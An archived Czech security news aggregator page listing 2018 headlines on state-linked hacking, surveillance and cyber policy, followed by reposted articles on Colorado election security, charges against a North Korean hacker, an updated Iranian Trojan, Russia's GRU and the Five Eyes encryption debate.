- BigBrothers -

Last update 09.10.2017 13:51:26

Home  Analysis  Android  Apple  APT  Attack  BigBrothers  BotNet  Congress  Crime  Crypto  Cryptocurrency  Cyber  CyberCrime  CyberSpy  CyberWar  Exploit  Forensics  Hacking  ICS  Incindent  iOS  IT  IoT  Mobil  OS  Phishing  Privacy  Ransomware  Safety  Security  Social  Spam  Vulnerebility  Virus  EN  List  Czech Press  Page

Introduction  List  Kategorie  Subcategory  0  1  2  3  4  5  6  7  8 


 


17.12.18

Germany’ BSI chief says ‘No Evidence’ of Huawei spying

BigBrothersSecurityaffairs

16.12.18

U.S. Ballistic Missile Defense Systems Fail Cybersecurity Audit

BigBrothers

Bleepingcomputer

14.12.18

AP Exclusive: Iran Hackers Hunt Nuke Workers, US OfficialsBigBrothersSecurityweek

14.12.18

Secure Critical Infrastructure Top of Mind for U.S.

BigBrothers

Net-security

13.12.18

French foreign ministry announced its Travel Alert Registry Hack

BigBrothersSecurityaffairs

13.12.18

Russia-Linked Phishing Attacks Hit Government Agencies on Four Continents

BigBrothersSecurityweek

13.12.18

U.S. Believes Chinese Intelligence Behind Marriott HackBigBrothersSecurityweek

13.12.18

Super Micro: No Malicious Hardware Found on MotherboardsBigBrothersSecurityweek

13.12.18

Guidelines for assessing ISPs’ security measures in the context of net neutrality

BigBrothers

Net-security

13.12.18

Hacking democracy efforts continue with upticks in malware deployments

BigBrothers

Net-security

12.12.18

Super Micro Says Its Gear Wasn’t Bugged By Chinese Spies

BigBrothers

Threatpost

11.12.18

Russian Critical Infrastructure Targeted by Profit-Driven CybercriminalsBigBrothersSecurityweek

10.12.18

Australia Anti-Encryption Law Rushed to PassageBigBrothersSecurityweek
8.12.18

Australia Anti-Encryption Law Triggers Sweeping Backlash

BigBrothers

Threatpost

7.12.18

Under Fire Huawei Agrees to UK Security Demands: ReportBigBrothersSecurityweek

7.12.18

EU Should Worry About Huawei, Other Chinese Firms: OfficialBigBrothersSecurityweek

7.12.18

North Korea-linked Hackers Target Academic InstitutionsBigBrothersSecurityweek

7.12.18

Australia Passes Anti-Encryption Bill—Here's Everything You Need To KnowBigBrothersThehackernews

7.12.18

Arrest of Tech Exec Signals Tougher US Stand on China Tech FirmsBigBrothersSecurityweek

7.12.18

Chinese Government Suspected in Marriott Hack: ReportBigBrothersSecurityweek
6.12.18Ukraine’s SBU: Russia carried out a cyberattack on Judiciary SystemsBigBrothersSecurityaffairs
6.12.18Australia Passes Cyber Snooping Laws With Global ImplicationsBigBrothersSecurityweek
6.12.18UK Spy Agency Joins NSA in Sharing Zero-Day Disclosure ProcessBigBrothersSecurityweek

6.12.18

Ukraine Accuses Russia of Cyberattack on Judiciary SystemsBigBrothersSecurityweek

6.12.18

White House Facial Recognition Pilot Raises Privacy Alarms

BigBrothers

Threatpost

5.12.18

House GOP Campaign Arm Targeted by 'Unknown Entity' in 2018BigBrothersSecurityweek

5.12.18

Email accounts of top NRCC officials were hacked in 2018

BigBrothers

Securityaffairs

5.12.18

National Republican Congressional Committee Hacked - Emails ExposedBigBrothersBleepingcomputer

4.12.18

Israeli Firm Rejects Alleged Connection to Khashoggi KillingBigBrothersSecurityweek
4.12.18

U.S. Military Members Catfished and Hooked for Thousands of Dollars

BigBrothers

Threatpost

3.12.18New Zealand Security Bureau halts Spark from using Huawei 5G equipmentBigBrothersSecurityaffairs
3.12.18Russian Hackers Use BREXIT Lures in Recent AttacksBigBrothersSecurityweek
3.12.18Kaspersky's U.S. Government Ban Upheld by Appeals CourtBigBrothersSecurityweek
3.12.18NATO Exercises Cyber Defences as Threat GrowsBigBrothersSecurityweek
2.12.18

UK's NCSC Explains How They Handle Discovered Vulnerabilities

BigBrothers

Bleepingcomputer
2.12.18

ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

BigBrothers

Securityaffairs
29.11.18Google Accused of Manipulation to Track Users

BigBrothers

Securityweek

28.11.18

New Zealand Halts Huawei From 5G Upgrade Over Security FearsBigBrothers

Securityweek

27.11.18

UK Parliament Seizes Confidential Facebook DocumentsBigBrothersSecurityweek

27.11.18

Google Wants to Ensure Integrity of EU Parliamentary ElectionsBigBrothersSecurityweek

27.11.18

Gov Committee Raises Concerns Over UK Critical Infrastructure Security

BigBrothers

Securityweek

27.11.18

UK Parliament seized confidential Facebook docs to investigate its data protection policies.

BigBrothers

Securityaffairs

24.11.18

US Government is asking allies to ban Huawei equipment

BigBrothers

Securityaffairs

22.11.18

German eID Authentication Flaw Lets You Change Identity

BigBrothers

Bleepingcomputer

19.11.18Suspected Russian Hackers Impersonate State Department AideBigBrothersPBWCZ.CZ
19.11.18Does Not Compute: Japan Cyber Security Minister Admits Shunning PCsBigBrothersPBWCZ.CZ
18.11.18Europol, Diebold Nixdorf to Share Information on Cyber ThreatsBigBrothersPBWCZ.CZ
18.11.18Japanese government’s cybersecurity strategy chief has never used a computerBigBrothersPBWCZ.CZ
16.11.18OPM Security Improves, But Many Issues Still Unresolved: GAOBigBrothersPBWCZ.CZ
16.11.18Congress passes bill that create new Cybersecurity and Infrastructure Security Agency at DHSBigBrothersPBWCZ.CZ

16.11.18

Secret Charges Against Julian Assange Revealed Due to "Cut-Paste" Error

BigBrothersThehackernews
14.11.18State vs. Federal Privacy Laws: The Battle for Consumer Data ProtectionBigBrothers  PrivacyPBWCZ.CZ
14.11.1851 States Pledge Support for Global Cybersecurity RulesBigBrothersPBWCZ.CZ
13.11.18Google Services down due to BGP leak, traffic hijacked through Russia, China, and NigeriaBigBrothersPBWCZ.CZ
13.11.18Cyberattacks Top Risk to Business in North America, EAP, Europe: WEFBigBrothersPBWCZ.CZ
12.11.18France seeks Global Talks on Cyberspace security and a “code of good conduct”BigBrothersPBWCZ.CZ
9.11.18Snowden speaks about the role of surveillance firm NSO Group in Khashoggi murderBigBrothersPBWCZ.CZ
9.11.18Experts detailed how China Telecom used BGP hijacking to redirect traffic worldwideBigBrothersPBWCZ.CZ
8.11.18China Telecom Constantly Misdirects Internet TrafficBigBrothersPBWCZ.CZ
8.11.18U.S. Cyber Command CNMF Shares unclassified malware samples via VirusTotalBigBrothersPBWCZ.CZ
8.11.18U.S. Air Force announced Hack the Air Force 3.0, the third Bug Bounty ProgramBigBrothersPBWCZ.CZ
7.11.18UK Regulator Calls for Tougher Rules on Personal Data UseBigBrothersPBWCZ.CZ
6.11.18U.S. Air Force Announces Third Bug Bounty ProgramBigBrothersPBWCZ.CZ
6.11.18Iran Accuses Israel of Failed Cyber AttackBigBrothersPBWCZ.CZ
6.11.18Google dorks were the root cause of a catastrophic compromise of CIA’s communicationsBigBrothersPBWCZ.CZ
6.11.18New attack by Anonymous Italy: personal data from ministries and police have been released onlineBigBrothersPBWCZ.CZ
5.11.18Kemp Cites Voter Database Hacking Attempt, Gives No EvidenceBigBrothersPBWCZ.CZ
3.11.18Joshua Adam Schulte, ex CIA employee, accused of continuing leaks from prisonBigBrothersPBWCZ.CZ
3.11.18Top Australia Defence company Austal notifies a serious security breachBigBrothersPBWCZ.CZ
3.11.18Cyber attack exposes sensitive data about a nuclear power plant in FranceBigBrothersPBWCZ.CZ
2.11.18Top Australia Defence Firm Reports Serious Cyber BreachBigBrothersPBWCZ.CZ
2.11.18Qualys Acquires Container Security Firm Layered InsightBigBrothersPBWCZ.CZ
2.11.18U.S. Intel Budget Soars Under TrumpBigBrothersPBWCZ.CZ
2.11.18US Accuses China, Taiwan Firms With Stealing Secrets From Chip Giant MicronBigBrothersPBWCZ.CZ
2.11.18New Bill Proposes Prison for Execs Misusing Consumer DataBigBrothersPBWCZ.CZ
1.11.18Iran hit by a more aggressive and sophisticated Stuxnet versionBigBrothersPBWCZ.CZ
1.11.1885 Millions of voter records available for sale ahead of the 18 US Midterm ElectionsBigBrothersPBWCZ.CZ
31.10.18UK Regulator Issues Second GDPR Enforcement Notice on Canadian FirmBigBrothersPBWCZ.CZ
31.10.18Ex-Air Force Airman in New Mexico Accused of Computer FraudBigBrothersPBWCZ.CZ
31.10.18Proposal for Cybersecurity Civilian Corps Gets Mixed ReceptionBigBrothersPBWCZ.CZ
30.10.18Russian Held as Agent Studied US Groups' CyberdefensesBigBrothersPBWCZ.CZ
30.10.18US Election Integrity Depends on Security-Challenged FirmsBigBrothersPBWCZ.CZ
29.10.18The Belgacom hack was the work of the UK GCHQ intelligence agencyBigBrothersPBWCZ.CZ
28.10.18Analysis of North Korea's Internet Traffic Shows a Nation Run Like a Criminal SyndicateBigBrothers  CyberPBWCZ.CZ
25.10.18Pentagon Launches Continuous Bug Bounty ProgramBigBrothersPBWCZ.CZ
24.10.18Super Micro to Customers: Chinese Spy Chips Story Is WrongBigBrothersPBWCZ.CZ
24.10.18Triton Malware Linked to Russian Government Research InstituteBigBrothers  VirusPBWCZ.CZ
24.10.18To Secure Medical Devices, the FDA Turns to Ethical HackersBigBrothersPBWCZ.CZ
24.10.18Russian Government-owned research institute linked to Triton attacksBigBrothersPBWCZ.CZ
23.10.18NATO military command center should be fully operational in 2023BigBrothersPBWCZ.CZ
23.10.18Israel Defense Forces were searching systems to spy on private social media messagesBigBrothersPBWCZ.CZ
22.10.18NSA-Linked 'DarkPulsar' Exploit Tool DetailedBigBrothersPBWCZ.CZ
22.10.18DarkPulsar and other NSA hacking tools used in hacking operations in the wildBigBrothersPBWCZ.CZ
21.10.18EU Leaders Vow Tough Action on Cyber AttacksBigBrothersPBWCZ.CZ
19.10.18'GreyEnergy' Cyberspies Target Ukraine, PolandBigBrothersPBWCZ.CZ
19.10.18Britain Leads Calls for EU Action Against HackersBigBrothersPBWCZ.CZ
18.10.18After 2016 Hack, Illinois Says Election System SecureBigBrothers  HackingPBWCZ.CZ
18.10.18Russia-Linked Hackers Target Diplomatic Entities in Central AsiaBigBrothersPBWCZ.CZ
17.10.1835 million US voter records available for sale in a hacking forumBigBrothersPBWCZ.CZ
14.10.18Pentagon Reveals Cyber Breach of Travel RecordsBigBrothersPBWCZ.CZ
14.10.18Pentagon Defense Department travel records data breachBigBrothersPBWCZ.CZ
14.10.18Ex-NASA Contractor Pleads Guilty in Cyberstalking SchemeBigBrothersPBWCZ.CZ
14.10.18U.S. Senators Demand Internal Memo Related to Google+ IncidentBigBrothersPBWCZ.CZ
13.10.18Five Eyes Intelligence agencies warn of popular hacking toolsBigBrothersPBWCZ.CZ
12.10.18'Five Eyes' Agencies Release Joint Report on Hacking ToolsBigBrothersPBWCZ.CZ
10.10.18New Pentagon Weapons Systems Easily Hacked: ReportBigBrothersPBWCZ.CZ
8.10.18UK, US Security Agencies Deny Investigating Chinese Spy ChipsBigBrothersPBWCZ.CZ
8.10.18Russia's Hackers Long Tied to Military, Secret ServicesBigBrothersPBWCZ.CZ
8.10.18Man Pleads Guilty to Hacking Websites of New York City Comptroller and West PointBigBrothersPBWCZ.CZ
7.10.18Russian State-Sponsored Operations Begin to Overlap: KasperskyBigBrothersPBWCZ.CZ
7.10.18DHS Warns of Threats to Precision AgricultureBigBrothersPBWCZ.CZ
7.10.18China Tech Stocks Lenovo, ZTE Tumble After Chip Hack ReportBigBrothersPBWCZ.CZ
7.10.18Industry Reactions to Chinese Spy Chips: Feedback FridayBigBrothersPBWCZ.CZ
7.10.18West Accuses Russian Spy Agency of Scores of AttacksBigBrothersPBWCZ.CZ
6.10.18US DoJ indicted 7 Russian Intelligence officers for attacking Anti-Doping OrganizationsBigBrothersPBWCZ.CZ
6.10.18DHS issued an alert on attacks aimed at Managed Service ProvidersBigBrothersPBWCZ.CZ
5.10.18Canada blames Russia for cyber attacks against its structuresBigBrothersPBWCZ.CZ
5.10.18Canada Says it Was Targeted by Russian Cyber AttacksBigBrothersPBWCZ.CZ
5.10.18DHS Warns of Threats to Precision AgricultureBigBrothersPBWCZ.CZ
5.10.18China Used Tiny Chips on US Computers to Steal Secrets: ReportBigBrothersPBWCZ.CZ
5.10.18China planted tiny chips on US computers for cyber espionageBigBrothersPBWCZ.CZ
5.10.18U.S. Charges 7 Russian Intel Officers as West Condemns GRUBigBrothersPBWCZ.CZ
5.10.18UK, Australia Blame Russia for Bad Rabbit, Other AttacksBigBrothersPBWCZ.CZ
5.10.18US to Let NATO Use its Cyber Defense SkillsBigBrothersPBWCZ.CZ
4.10.18US offers its cyber warfare defense capabilities to NATOBigBrothersPBWCZ.CZ
4.10.18U.S. Links North Korean Government to ATM HacksBigBrothersPBWCZ.CZ
4.10.18California Law Sets Up Fresh Legal Clash Over 'Net Neutrality'BigBrothersPBWCZ.CZ
2.10.18U.S. Energy Department Invests Another $28 Million in CybersecurityBigBrothersPBWCZ.CZ
28.9.18EU Lawmakers Push for Cybersecurity, Data Audit of FacebookBigBrothersPBWCZ.CZ
27.9.18Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky LeakBigBrothersPBWCZ.CZ
27.9.18Senate Committee Approves Several Cybersecurity BillsBigBrothersPBWCZ.CZ
27.9.18Senate Panel to Hear From Internet Execs on Privacy PoliciesBigBrothersPBWCZ.CZ
26.9.18U.S. Unveils First Step Toward New Online Privacy RulesBigBrothersPBWCZ.CZ
26.9.18Ex-NSA Hacker Sentenced to Jail Over Kaspersky LeakBigBrothersPBWCZ.CZ
25.9.18U.S. General Service Administration Launches Bug Bounty ProgramBigBrothersPBWCZ.CZ
22.9.18NSA-Linked 'DarkPulsar' Exploit Tool DetailedBigBrothersPBWCZ.CZ
22.9.18Lawmaker: US Senate, Staff Targeted by State-Backed HackersBigBrothersPBWCZ.CZ
22.9.18FBI Warns of Cyber-Thieves Targeting Payroll AccountsBigBrothersPBWCZ.CZ
22.9.18Department of Defense Releases New Cyber StrategyBigBrothersPBWCZ.CZ
21.9.18US State Department confirms data breach to unclassified email systemBigBrothersPBWCZ.CZ
20.9.18Nation State Cyber Attacks on Rise, Says EuropolBigBrothersPBWCZ.CZ
20.9.18iOS 12 Brings Patches for 16 Security VulnerabilitiesBigBrothersPBWCZ.CZ
17.9.18Dutch expelled two Russian spies over hack plan on Swiss lab working on Skripal caseBigBrothersPBWCZ.CZ
15.9.18Trump OKs Sanctions for Foreigners Who Meddle in ElectionsBigBrothersPBWCZ.CZ
15.9.18Russian Spies Arrested on Suspicion of Plans to Hack Swiss LaboratoryBigBrothersPBWCZ.CZ
15.9.18German Troops Face Russian 'Hybrid War' in Lithuania: MerkelBigBrothersPBWCZ.CZ
14.9.18Greek Supreme Court Approves Russian Request for Bitcoin SuspectBigBrothersPBWCZ.CZ
14.9.18N. Korea Calls Sony, Wannacry Hack Charges Smear CampaignBigBrothersPBWCZ.CZ
14.9.18Senators Concerned About State Department's Cybersecurity FailuresBigBrothersPBWCZ.CZ
10.9.18Georgia Extradites Russian Data Theft Suspect to USBigBrothersPBWCZ.CZ
8.9.18Opsec Mistakes Allowed U.S. to Link North Korean Man to HacksBigBrothersPBWCZ.CZ
8.9.18Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to USBigBrothersPBWCZ.CZ

Homeland Security Head: Colorado Tops US in Vote Security
8.9.18 securityweek BigBrothers

Colorado, whose election systems are ranked among the nation's safest, held a cyber-security and disaster exercise Thursday for dozens of state, county and federal elections officials to reinforce the state's preparedness for, and public confidence in, November's midterm elections.

Participants included Department of Homeland Security cyber experts working with county elections clerks to confront a rapid-fire sequence of scenarios. In a brief appearance, Homeland Security Secretary Kristjen Nielsen praised Colorado as a national leader in safeguarding elections.

On Wednesday, Nielsen called election security one of the nation's highest priorities. She said the biggest threats are coming online from malicious nation-states seeking to disrupt democracy.

The U.S. intelligence community has said Russia had tried to influence the 2016 election to benefit President Donald Trump. Nielsen frequently has said the Russians attempted to sow discord and undermine faith in the democratic process and, over time, developed a preference for then-candidate Trump.

On Thursday, Nielsen reiterated her concerns about potential Russian hacking or interference, particularly of voter databases this year. But she said no attempts have been detected so far that match the scale of the 2016 effort.

"Any attempt to interfere in our elections is a direct attack on our democracy and is unacceptable," Nielsen told participants at a Denver hotel. Turning to Colorado's record, she declared: "We'd love to continue to use you as an example of what other states can adopt."

Among them, she said, her department wants all 50 states to conduct postelection risk-limiting audits, which strictly ensure the accuracy of vote counts, by 2020. It's standard practice in Colorado.

Colorado's Republican Secretary of State, Wayne Williams, said the exercise aimed to increase public confidence that votes are safe.

"So we can tell you that nobody in Russia, nobody in China, nobody anywhere else in the world can change a ballot in Colorado," Williams said.

Colorado was the only one among 21 targeted states to report to Homeland Security — not the other way around — that Russian interests attempted to hack into its systems in 2016, said state elections director Judd Choate.

It's invested in new vote tabulating machines and creates a separate paper trail of each ballot cast. Since 2013, it's required two-factor authentication for elections systems operators to access equipment. The secretary of state's office has more internet technology staff than purely elections-related staff, and it has plans, which Choate wouldn't disclose for security reasons, to guarantee security and privacy in the remote case the state's voter registration database is hacked.

This year, the state also will monitor Facebook, Twitter and Instagram starting well ahead of the election to detect and respond to false rumors about voting procedures, outages, and other voting problems. It also will collect intelligence on efforts to sway voters on social media, Choate said. He noted that Colorado's collaboration with Homeland Security is strong.

Choate warned the dozens of clerks, database experts and others that Thursday's exercise would be tough, involving, among a cascade of other problems, attempts to hack voter rolls, detect possible malware planted in voting systems weeks beforehand, phishing and responding to social media posts claiming systems were hacked or voters turned away. The exercise concerned both the weeks leading up to the election and election day itself.

"Like the worst possible election day and election that you've ever seen in your life. So there's every single disaster that you probably thought couldn't happen, and then about 15 that you wouldn't even thought through," Choate said.

Paul Huntsberger, database chief for Denver County's elections division, worked with colleagues from across the state responding or devising responses to the disaster scenarios: Def Con hackers in Las Vegas, electricity outages, security patches, verifying clearances and background checks for personnel, responding to ransomware attacks in other states.

Throughout, officials masquerading as citizens and news reporters demanded immediate answers to security questions.

"All of this is needed," Huntsberger said during a brief break. "And we're proving that communication, secure communication, is key to making it work."


Industry Reactions to U.S. Charging North Korean Hacker: Feedback Friday
8.9.18 securityweek BigBrothers

A North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the notorious Lazarus Group.

Park Jin Hyok, 34, has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint made public on Thursday focuses on four of the hacker group’s operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Experts comment on U.S. charging Park Jin Hyok with hacking

Investigators have found several links between Park, the Lazarus Group and Chosun Expo Joint Venture, also known as Korea Expo Joint Venture (KEJV), a North Korean government front company allegedly used to support its cyber activities.

Industry professionals have commented on various aspects of the story, including Lazarus Group’s ongoing activities and the impact of the charges brought against Park.

And the feedback begins...

Ed McAndrew, Partner & Co-Chair, Privacy & Data Security Group at Ballard Spahr:

“Why today? Even with the benefit of having served as a federal cybercrime prosecutor for almost 10 years, I’m struggling to understand why the DOJ unsealed this complaint today. There is no imminent activity, law enforcement or otherwise, that supports the unsealing right now. It seems intended only to “name and shame” Hyok and the North Korean Government, for actions that the US Government has already publicly attributed to North Korea.

Why a complaint, instead of a grand jury indictment? The manner of charging Hyok is odd. This is a criminal complaint; not an indictment. Complaints are used to charge people quickly when they have been arrested or are facing imminent arrest. Generally, the DOJ has been using “name and shame” indictments against cybercrime agents of foreign governments. Because Mr. Hyok has not been arrested and is unlikely to ever see the inside of the US courtroom, the use of a complaint here is odd.

I think this indictment will have little tangible impact on Mr. Hyok, unless he is an avid international traveler. He is unlikely to face arrest unless he travels to a country that cooperates with US law enforcement or has an extradition treaty with the United States. It is also unlikely to have little impact on North Korea, which will almost certainly deny the allegations. The US Government has already accused North Korea of being linked to these criminal actions, so charging one individual who will never face prosecution seems to be of limited value, at best.

There’s also a potential downside to US law enforcement in publicizing this level of detail about the methodology behind cyber investigations and the sources and types of evidence used to attribute cybercriminal activity to a particular individual. The affidavit shows how capable our law enforcement agencies are in tracking cyber bread crumbs and connecting digital dots. However, the affidavit almost certainly will be studied by cybercriminals and nation state actors on how to improve their own operational security and avoid detection in the future. In my view, that potential cost outweighs the benefit of disclosure in this case.”

Eric Chien, technical director, Symantec Security Response:

“What’s perhaps most interesting about the DOJ indictment is that law enforcement was able to identify Park Jin Hyok as part of the Lazarus group by obtaining emails from his Hotmail and Gmail accounts. Surprisingly, Park used the same email accounts for the legitimate software development work, as well as hacking activity attributed to Lazarus. Park’s resume and image were discovered in his email, which helped law enforcement attribute the hacking activity back to him specifically.

We’ll likely see Lazarus move away from these free email services, given they’ll have to re-tool their entire infrastructure, including email accounts, passwords, servers, etc. now that they know they’re being watched. Lately, the group’s main focus has been on cryptocurrency – most of the attacks from the past year that we believe are related to Lazarus have targeted crypto-related victims (i.e. ICO providers, cryptocurrency banks, mining pool providers, etc.). It’s unlikely that this indictment will stop the group entirely – judging from their history, such as the Sony breach and WannaCry, they’re brazen and not scared of getting caught.”

Benjamin Read, senior manager, cyber espionage analysis, FireEye:

“The US Department of Justice’s criminal complaint describing a North Korean national’s role in a wide range of intrusion activity is consistent with FireEye’s analysis of both the scope and attribution of this activity, which we link to the group TEMP.Hermit. While we do not have insight into all of the incidents described in the complaint, our analysis concurs with the conclusion that the actors responsible for multiple financially motivated intrusions, the WannaCry ransomware and many of the other incidents are linked by shared development resources. FireEye has observed these malicious operations continuing at a high pace over the last two years and impacting numerous organizations.

FireEye assisted the US Government with analysis of malware provided by the Department of Justice in support of this effort; however, we cannot comment on the specifics of that analysis. Our company assessments are made based only on data we have independently obtained through Mandiant incident response, FireEye devices and other sources.”

Sherrod DeGrippo, director of threat research and detection, Proofpoint:

The Lazarus group is still very active. Most recently we profiled the financially motivated arm of the organization and their work targeting South Korean point-of-sale infrastructure and, separately, cryptocurrency wallets and exchanges. The Lazarus Group also includes both disruption and espionage arms engaged in ongoing efforts worldwide.

Mukul Kumar, Chief Information Security Officer and VP of Cyber Practice, Cavirin:

“Though the Sony Breach hasn’t been in the news for a while, the charges prove that we’re getting better at identifying the ultimate sources of breaches. This of course also applies to non state-sponsored hackers, who may have believed that they could not be tracked.”

Bill Conner, CEO, SonicWall:

“The Sony breach and WannaCry ransomware attacks are milestones for those in the IT industry, as they mark a day we’ll never forget and a distinct moment when the cyber war was brought to the attention of those who were unsuspecting to it. Law enforcement agencies and government officials around the world are challenged by the internet’s invisible boarders and its nameless perpetrators when it comes to pursuing or charging cyber criminals. While almost four years have passed since the communications giant sent notifications of its attacks, the U.S. Justice Department’s actions are commendable and should serve as a reminder for consumers and organizations alike to remain vigilant.

In today’s connected world, it is irresponsible to operate online without strict security standards. Total end-to-end security is key, including a layered approach to security across wired, wireless, mobile and cloud networks, as well as the securing IoT devices to prevent tampering and unauthorized access.”

David Maxwell, Senior Fellow, FDD:

“Although there is a significant time lapse between the hack and this indictment, it shows that the U.S. is tracking the North Korea threat, and that despite the current nuclear diplomacy the U.S. will pursue cyber operatives and hacker/criminals who wish to do the U.S. and the U.S. economy harm.

The U.S. has to address cyber threats, though this is just one very small step toward improving cyber defenses. The U.S. has to make it known it will hunt down hackers who do us harm, whether they are individuals or working for state actors such as North Korea.

It is also important the American public knows its government is going after these threats and will relentlessly pursue the perpetrators of cyber attacks.

It is especially important the U.S. goes after North Korea's cyber capabilities because Pyongyang is relying on illicit activities for funding and, ultimately, to support regime survival. Cyber provides the regime with a broad range of capabilities: from stealing funds, to espionage, to influencing social media information, to hacking enemies, and to attacking infrastructure. In many ways, cyber is much more practical and valuable than nuclear weapons.

This supports continued maximum pressure on North Korea, as cyber activities help the regime generate revenue through other means that have been stopped because of sanctions.”

Dmitri Alperovitch, CTO and co-founder of CrowdStrike:

“DPRK cyber adversaries represent some of the most active and disruptive threat groups today. Their tradecraft continues to grow in sophistication, leveraging cyber capabilities for conducting data exploitation, data destruction, cyber espionage and financially-motivated criminal activity — often costing organizations millions of dollars in damages. In the past year, we’ve witnessed DPRK commit to expansive cyber operations in support of their ability to service regime priorities and effectuate national interest. These crimes have impacted the global financial system and nearly every sector of the economy.

One of the most important steps taken towards achieving effective cyber deterrence is the attribution of these attacks and holding the perpetrators accountable, as we witnessed today by the announcement of the US Department of Justice.”


Iranian Hackers Improve Recently Used Cyber Weapon
6.9.18 securityweek BigBrothers

The Iran-linked cyberespionage group OilRig was recently observed using a variant of the OopsIE Trojan that was updated with new evasion capabilities, Palo Alto Networks reports.

The group has been persistently targeting government entities in the Middle East with previously identified tools and tactics, including the OopsIE Trojan that was first identified in February 18. Unlike previously observed samples, the new iteration packs anti-analysis and anti-virtual machine capabilities, which allows it to further evade detection.

The attacks involving this Trojan variant were detected in July, as part of a campaign that also delivered the QUADAGENT backdoor. However, each malicious program was targeting a different organization.

As part of that wave of attacks, the hackers were using compromised email accounts at a government organization in the Middle East to send spear phishing emails delivering the OopsIE Trojan. The attacks targeted a government agency within the same nation state, Palo Alto Networks’ researchers found.

The email was sent to the email address of a user group that had published documents regarding business continuity management on the Internet. The attackers used lures specifically crafted for this assault.

The OopsIE Trojan begins execution by performing multiple anti-virtualization and sandbox checks. The malware would check CPU fan information, temperature, mouse pointer, hard disk, motherboard, time zone, and human interaction, while also looking for DLLs associated with Sandboxie, VBox, and VMware.

While some of these techniques have been observed in other malware before, OopsIE appears to be the first to check the CPU fan. The CPU temperature check was previously seen being used by GravityRAT.

The time zone check is also of interest, as the Trojan would only execute if it finds strings for Iran, Arab, Arabia and Middle East. These point to five time zones that encompass 10 countries, showing that the malware is highly targeted.

The updated Trojan variant packs most of the functionality previously associated with the threat, but also includes obfuscation, in addition to requiring the user to interact with an error dialog box (the last in the previously mentioned series of checks).

Next, the malware sleeps for two seconds, then moves itself to the App Data folder and creates a scheduled task to run a VBScript that ensures persistence. The process attempts to run the Trojan every three minutes.

The malware then starts communication with the command and control (C&C) server (it uses the www.windowspatch[.]com domain as C&C).

The malware includes support for various commands that it receives from the server. It can run the command, write the output to a file and send it to the server; download a file to the system; read a specified file and upload its contents, and uninstall itself.

“Within the time frame we have been tracking the OilRig group, they have repeatedly shown a willingness to add less commonly found functionality to their tools, such as their heavy use of DNS tunneling in their backdoors or adding authentication to their webshells. This attack is no different, now adding anti-analysis capabilities into their tools. This adversary is highly resourceful and continues to adapt over time,” Palo Alto Networks concludes.


What's GRU? A Look at Russia's Shadowy Military Spies
6.9.18 securityweek BigBrothers

MOSCOW (AP) — GRU isn't as well-known a baleful acronym as KGB or FSB. But Russia's military intelligence service is attracting increasing attention as allegations mount of devious and deadly operations on and off the field of battle.

The latest charge came Wednesday, when Britain identified two suspects in this year's nerve-agent poisonings as GRU agents.

An overview of the GRU:

THE AGENCY

Formally named the Main Directorate of the General Staff of the Armed Forces, the agency is almost universally referred to by its former acronym GRU.

It is the most shadowy of Russia's secret services. When its previous director Igor Sergun died in 2016, the Kremlin announcement was so terse that it gave neither the date, cause or place of death.

The agency has an apparently broad mandate. According to the Defense Ministry website, it is tasked not only with "ensuring conditions conducive to the successful implementation of the Russian Federation's defense and security policy" but with providing officials intelligence " that they need to make decisions in the political, economic, defense, scientific, technical and environmental areas."

ALLEGATIONS

Britain claims that two GRU agents carried out this spring's attack with the nerve agent Novichok on Sergei Skripal, a former GRU officer who became a British double agent, and his daughter. Both survived the poisoning in the city of Salisbury, but three months later two area residents were sickened by the same nerve agent, one of them fatally — it is believed they found the discarded bottle that had carried the Skripals' poison.

This week's claim came less than two months after the U.S. indicted 12 alleged GRU agents for hacking into the Hillary Clinton presidential campaign and the Democratic Party and releasing tens of thousands of private communications, part of a sweeping conspiracy by the Kremlin to meddle in the 2016 U.S. election.

Also this year, the investigative group Bellingcat reported that a GRU officer was in charge of operations in eastern Ukraine, where Russia-backed separatists were fighting Ukrainian forces, in July 2014 when a Malaysian passenger airliner was shot down, killing all 298 people aboard. International investigators say the plane was shot down by a mobile missile launcher brought in from Russia. The GRU officer named by Bellingcat reportedly was responsible for weapons transfers.

Russia's RBC news service reported this year that the GRU oversees Russian mercenaries in Syria, fighting there as a so-called shadow army.

Russian authorities generally deny allegations against the GRU and refuse to discuss its activities. They said they didn't recognize the suspects Britain named Wednesday in the Salisbury poisoning.

OTHER AGENCIES

The GRU is one arm of Russia's extensive security and intelligence apparatus, which also includes the Foreign Intelligence Service, known as the SVR, and the Federal Security Service, or FSB, which conducts domestic intelligence and counterintelligence. The SVR and FSB were spun off from the KGB after the collapse of the Soviet Union. A former KGB agent, Vladimir Putin ran the FSB before ascending to the presidency.

And as president, Putin names the top brass in the GRU. Of all the agencies, the FSB looms largest in Russians' minds because it hunts domestic threats. The GRU, created under Soviet founder Vladimir Lenin, has a more ruthless reputation, but focuses its energies on foreign threats.

The agencies' operations appear to both compete and cooperate.

Pavel Felgenhauer, an independent Moscow-based military analyst, told The Associated Press that if "the SVR runs into military intelligence, they have to share it with the GRU; that means they try not to run into military intelligence and tell their agents not to report anything military even if they know it. The other way around, military or GRU assets are asked never to report anything political."

But in the case of the alleged U.S. election-related hacking, he said, "I believe that was an inter-service operation, because it's not military but they gained some kind of hacking access and then they shared it with the FSB and the SVR."


'Five Eyes' Agencies Demand Reignites Encryption Debate
5.9.18 securityweek  BigBrothers

Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called "backdoor" access to encrypted content and devices.

The reaction came following a weekend statement from the "Five Eyes" intelligence agencies calling on "industry partners" to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.

The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.

"Many of the same means of encryption that are being used to protect personal, commercial and government information are also being used by criminals, including child sex offenders, terrorists and organized crime groups to frustrate investigations and avoid detection and prosecution," said the statement from the five countries issued by Australia's Department of Home Affairs.

Without voluntary cooperation, the agencies said, "we may pursue technological, enforcement, legislative or other measures to achieve lawful access solutions."

